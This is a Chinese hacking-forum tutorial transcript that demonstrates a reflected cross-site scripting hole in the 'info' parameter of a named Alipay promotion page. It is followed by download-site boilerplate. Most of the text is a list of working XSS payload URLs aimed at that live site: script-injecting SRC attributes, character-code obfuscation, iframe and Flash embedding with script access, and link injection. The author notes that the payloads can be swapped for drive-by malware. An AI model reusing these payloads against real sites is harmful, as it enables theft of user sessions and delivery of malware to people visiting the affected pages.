大家好 我是凯文比比奇
今天给大家带来一个关于xss跨站的教程
这是漏洞地址http://union.alipay.com/alipay/choujiang1/order.php
好了`大家看我操作啦 是淘宝的
看到了没
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=%3Cstrong%3E%B7%C7%B3%A3%B8%D0%D0%BB%C4%FA%B5%C4%B2%CE%D3%EB%A3%AC%B4%CB%BD%BB%D2%D7%BA%C5%B2%BB%C4%DC%B2%CE%D3%EB%B8%C3%CA%B1%B6%CE%B9%CE%BD%B1%0D%0A%CD%AC%CA%B1%C2%FA%D7%E3%D2%D4%CF%C2%CC%F5%BC%FE%B5%C4%BD%BB%D2%D7%BA%C5%BF%C9%B2%CE%D3%EB%B1%BE%C6%DA%B9%CE%BD%B1%A3%BA%3C%2Fstrong%3E%3Cbr%2F%3E%3Cul%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E%BB%EE%B6%AF%C6%DA%BC%E4%D4%DA%CC%D4%B1%A6%B9%BA%CE%EF%A3%AC%CA%D7%B4%CE%B8%B6%BF%EE%B5%BD%D6%A7%B8%B6%B1%A6%B5%C4%BD%BB%D2%D7%BA%C5%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F18-7%2F25%CD%EA%B3%C9%B8%B6%BF%EE%B5%C4%BB%E1%D4%B1%D4%DA7%2F27-8%2F1%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F26-7%2F31%CD%EA%B3%C9%BD%BB%D2%D7%B5%C4%BB%E1%D4%B1%D4%DA8%2F2-8%2F5%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3C%2Ful%3E
这是url编码
支付宝交易号是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这个页面来传递的，而url编码是http识得的
好了，既然这样那么我们可以来构造语句，当然这里是存在xss跨站漏洞的 我们来测试一下,这样上不行的 我们再来看
看到了吗。是可以的，看到了没``好了，我们再来看看其他的几种xss测试代码
都行的，下面的这些测试代码我都测试过，都通过，

测试代码:
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这段是利用标签插如js脚本
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC="javascript:alert('XSS');">
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC=javascript:alert("XSS")>
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC=`javascript:alert("RSnake says, 'XSS'")`>这三种都是一样的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC=javascript:alert(String.fromCharCode(83,83,83))>利用js编码fromCharCode(83,83,83)达到跨站目的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC="javascript:alert('XSS');">框架，懂挂马的朋友都知道的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC="http://union.alipay.com/alipay/imagefile/market/cj_index.swf" AllowScriptAccess="always">这段xss是利用html里面的插入.swf动画
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info= SRC="http://union.alipay.com/alipay/imagefile/market/cj_02.jpg">>这段是src带插入图片的
administratorhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=administrator>超连接
通过来插入超连接的

好了。来总结一下
该跨站是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=地址传递html值从而存在跨站的
这个漏洞也有人发现过，这里只是通过教程发出来 让大家知道跨站的危害 ，假如我们把上面这些跨站代码里面的一些javascript脚本或是swf等利用html潜入的文件改成网马之类的就存在很大的危害噢``

好了 教程就到这里吧 有什么不懂的问题就加我好了 Q:49771579
最后希望黑鹰管理员给我发一个邀请码咯 好方便以后去黑鹰和大家共同交流学习 Email：service-mail@163.com
谢谢大家观看 拜拜``

• [VIP专用软件 - 电信高速下载][非高级会员不可下载]
• [VIP专用软件 - 双线高速下载][非高级会员不可下载]

• ☉ Delphi编程教学系列（新世纪网安基地VIP教程）
• ☉ virtualpc中的linux如何连上Internet
• ☉ ProE 2.0安装视频
• ☉ 学会利用系统自身资源
• ☉ JSP开发之一Servlet基础
• ☉ 内网架设DNS服务器详解
• ☉ 心动吧桌面图之serv-U反弹
• ☉ 小解TTL的妙用
• ☉ 免费的网络电脑
• ☉ 略施小计吓跑不怀好意的菜鸟

• ☉ 由于私服程序的特殊性，它非常容易被杀毒误报，所以自2011年1月起本站所有软件都不在做杀毒查杀，请下载后自行检测查杀！
• ☉ 为了达到最快的下载速度，推荐使用 迅雷5 下载本站软件。
• ☉ 本站软件均为WinRAR3.7版本压缩，所以请一定升级到WinRAR3.7或最新版才能正常解压本站提供的软件!
• ☉ 如果您发现下载链接错误，或内容与分类不匹配，请点击报告错误。正确报错10个我们将送您VIP会员！
• ☉ 如发现本站软件需要解压密码，均为：www.9876543210sf.com